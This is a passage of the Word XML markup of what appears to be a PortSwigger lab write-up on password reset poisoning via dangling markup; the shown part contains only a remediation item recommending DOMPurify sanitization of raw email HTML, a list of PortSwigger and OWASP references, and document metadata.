              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Sanitize Raw Email View</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Apply the same sanitization (e.g., DOMPurify) to the raw HTML email view as to the rendered view.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E74B5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger: HTTP Host Header Attacks — https://portswigger.net/web-security/host-header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger: Dangling Markup Injection — https://portswigger.net/web-security/cross-site-scripting/dangling-markup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger: Password Reset Poisoning — https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP: Testing for Host Header Injection — https://owasp.org/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="10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Password Reset Poisoning via Dangling Markup  |  Expert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PortSwigger Web Security Academy — Lab Writeup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2026-04-16T04:32:44.305Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-16T04:32:44.306Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>